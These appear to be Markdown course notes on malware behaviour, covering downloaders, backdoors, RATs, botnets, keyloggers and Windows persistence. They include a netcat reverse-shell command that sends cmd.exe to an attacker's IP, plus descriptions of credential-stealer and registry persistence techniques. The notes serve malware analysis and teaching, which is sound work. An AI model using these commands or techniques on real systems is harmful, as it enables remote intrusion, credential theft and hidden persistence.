203 lines
8.7 KiB
Markdown
203 lines
8.7 KiB
Markdown
# Malware Behaviour
|
|
|
|
### Downloaders
|
|
|
|
*Downloaders* simply download another piece of malware from the internet and execute it on the local system. Downloaders are often packaged with an exploit.
|
|
|
|
- Downloaders often use `URLDownloadToFileA`
|
|
- Followed by a called to `WinExec`
|
|
- To download and execute the new malware
|
|
- Are often called *droppers*
|
|
|
|
### Launchers
|
|
|
|
A launcher is any executable that installs malware for immediate or future covert execution.
|
|
|
|
- Often contains the malware payload embedded within the file
|
|
|
|
### Backdoors
|
|
|
|
A *backdoor* is a type of malware that provides an attacker with remote access to a victims machine. Backdoor code often implements a full set of capabilities so when using a backdoor, attackers don't need to download additional malware or code.
|
|
|
|
- Common variants
|
|
- Reverse Shells
|
|
- Remote Access Trojans (RATs)
|
|
- Botnets
|
|
- Commonly communicate over port 80 using `HTTP`
|
|
- `HTTP` is the most commonly used protocol for outgoing network traffic
|
|
- So it offers the malware the best chance of blending in to normal traffic
|
|
- Often provide a common set of functionality
|
|
- Manipulate registry keys
|
|
- Enumerate display windows
|
|
- Create directories
|
|
- Search for files
|
|
- Can determine the functionality provided by looking at the Windows API functions imported
|
|
|
|
#### Reverse Shell
|
|
|
|
A reverse shell is a connection that originates from an infected machine and provides attackers shell access to that machine.
|
|
|
|
- The simplest type of backdoor
|
|
- Provides attack with standard shell
|
|
- Offers same functionality as being logged into the machine
|
|
- Called a reverse shell because rather than the attacker connecting to the infected machine, the infected machine connects back to the attackers machine
|
|
- This is done as the victim's machine is often sitting behind a firewall blocking incoming traffic on most ports.
|
|
- Whereas outgoing traffic on random high number ports is often unblocked
|
|
- Either offered standalone or as part of a more sophisticated backdoor
|
|
|
|
##### Creating a reverse shell
|
|
|
|
###### Using Netcat
|
|
|
|
- Can be created quite simply using the `netcat` program
|
|
|
|
- This is done by setting up a listener on the attackers machine
|
|
|
|
- ```bash
|
|
nc -l -p 80
|
|
```
|
|
|
|
- Where `-l` is the listen flag and `-p` is the port flag to listen on 80
|
|
|
|
- Then netcat is run on the victims machine
|
|
|
|
- ```bash
|
|
nc <attackers ip> 80 -e cmd.exe
|
|
```
|
|
|
|
- The `-e` option is the program to execute over the connection once the connection is established
|
|
|
|
- Tying std input and std output from the program to the network socket
|
|
|
|
###### Using Windows API
|
|
|
|
This can be done in two ways: basic and multi-threaded
|
|
|
|
The **basic** method is popular as is easy to write and achieves the same thing.
|
|
|
|
It uses a call to `CreateProcess` and manipulates the `STARTUPINFO` structure.
|
|
|
|
1. First a socket to the remote server is established
|
|
2. That sockets standard streams are stored and spliced into `STARTUPINFO`
|
|
3. So that when `CreateProcess` is called with the `STARTUPINFO` passed in, standard input, output and error is piped to the attacker
|
|
|
|
The multithreaded approach is the same, except instead of tying the streams from command line directly to the socket, two threads sit inbetween (one for input, one for output) . These threads can be used to encrypt and decrypt data so is not sent in the clear.
|
|
|
|
- API calls `CreateThread` and `CreatePipe` should be looked for
|
|
- The two pipes are needed to redirect input and output to the thread
|
|
- Two threads are needed
|
|
- One for reading from the stdin pipe and writing to the socket
|
|
- One for reading from the socket and writing to the stdout pipe
|
|
- Then the `CreateProcess` method can be used to tie the standard streams to the pipes instead of directly to the socket.
|
|
|
|
### Remote Administration Tool (RAT)
|
|
|
|
- Often used in targeted attacks with a specific goal
|
|
- Typically communicate over common ports (e.g. 80 and 443)
|
|
- RAT server runs on the victim, implanted within malware
|
|
- Client runs remotely as a command and control unit operated by attacker
|
|
- Server connects back to the server to start a connection, then controlled by the client (the attacker)
|
|
|
|

|
|
|
|
Server will poll the client for new commands - there is not a permanent connection (as to not arouse suspicion)
|
|
|
|
### Botnet
|
|
|
|
- Botnet is a collection of compromised hosts (known as zombies)
|
|
- Controlled by a single entity through the use of a server
|
|
- Goal of a botnet to compromise as many hosts as possible
|
|
|
|
| RATs | BotNet |
|
|
| ------------------------------ | ------------------------------ |
|
|
| Typically control fewer hosts | Infect millions |
|
|
| Used in targeted attacks | Used in mass attack |
|
|
| Controlled on per-victim level | All zombies controlled as once |
|
|
|
|
### Credential Stealing
|
|
|
|
- Attackers will go to great lengths to steal credentials
|
|
- Three general approaches
|
|
- Programs that waits for a user to log in
|
|
- Programs that dump information stored in Windows (e.g password hashes)
|
|
- Programs that log keystrokes
|
|
|
|
#### Windows Login
|
|
|
|
- Windows enables you to extend the login mechanism
|
|
- In windows XP, this was done by *Graphical Identification* *and Authentication* (GINA) API
|
|
- Later windows versions use *Credential Provider*
|
|
- Possible to use these to install credential stealers by pretending to be a credential provider
|
|
|
|
Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `dll` to a malicious one.
|
|
|
|
##### Hash Dumping
|
|
|
|
- Another popular method of obtaining Windows credentials is *hash dumping*
|
|
- Aim is to copy the password hashes off system
|
|
- Don't get the password, but often get an equivalent
|
|
- Source code for several tools is available, often used by malware authors
|
|
- But also recognised by antivirus authors - therefore malware authors modify it slightly
|
|
|
|
### Keyloggers
|
|
|
|
- Intercepting Windows login or hash dumping will only provide details of the username and password to log into the computer
|
|
- Will not provide details of other resources
|
|
- Alternative approach is to log user key presses
|
|
- This will capture any password typed into the system
|
|
- Keyloggers can be implemented in both kernel space and user space
|
|
- Kernel based is very difficult to detected with user level applications
|
|
- Frequently used as part of a root kit
|
|
- Act as a keyboard driver to capture keystrokes bypasses user-space programs and protections
|
|
|
|
#### User-space keyloggers
|
|
|
|
- Windows API provides two ways to implement a keylogger in user-space
|
|
- Hooking - get windows to notify the malware every time a key is pressed
|
|
- Hooking typically makes use of `SetWindowsHookEx()`
|
|
- Can alter key presses as well
|
|
- Typically will include `.exe` which will intiate the hook function
|
|
- And a `dll` to handle the logging
|
|
- This `dll` is injected to other processes on the system
|
|
- Polling - malware interrogrates Windows to see if a specific key is pressed
|
|
- Make use of the `GetAsyncKeyState()` API function which returns a boolean
|
|
- All the keys are iterated through to see what specific key is pressed
|
|
- `GetForegroundWindow()` - shows window title
|
|
|
|
###### Identifying Keyloggers
|
|
|
|
- If malware wants to log all keys, then it will need to have names for keys like `[Num Lock]`, `[Page Up]`, `[Page Down]` or the cursor keys
|
|
- Might also have strings such as `qwerty...vbnm` present
|
|
|
|
## Persistence Mechanisms
|
|
|
|
- Various ways malware can get on a system
|
|
- But also needs to ensure it stays on the system for a long time
|
|
- Otherwise rebooting the system would be enough to clear it
|
|
- Various mechanisms are available for the malware to hook in
|
|
|
|
###### Via Registry
|
|
|
|
- Various places in the Windows Registry that can be used to install malware permanently
|
|
- Most popular is to register under:
|
|
- `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
|
|
- Tools available that can show all the programs that will automatically run on your system
|
|
- Note that the mechanisms available change as Windows develops
|
|
|
|
###### Image File Executable Options
|
|
|
|
- One option is the image File Execution Options in the registry
|
|
- Aimed at letting you debug a program
|
|
- Set at:
|
|
- `HKLM\Software\Microsoft\Windows NT\CurrentVersion\ImageFileExecution Options\{exe}`
|
|
- Can set a key here called debugger which contains the full path to the debugger (or your malware)
|
|
- Set this on a program that is likely to run and the malware will be launched when the program is run
|
|
- Can also be used for malware analysis
|
|
|
|
###### SVCHOST DLLs
|
|
|
|
- Malware often installed as a Windows service
|
|
- But typically requires implementing as a `exe`
|
|
- However, Windows provides `svchost.exe` that lets you implement a service as a `dll`
|
|
- Many Windows services are implemented as a `DLL` using `svchost.exe`
|
|
- Causes the malware to blend into the process list and registry better |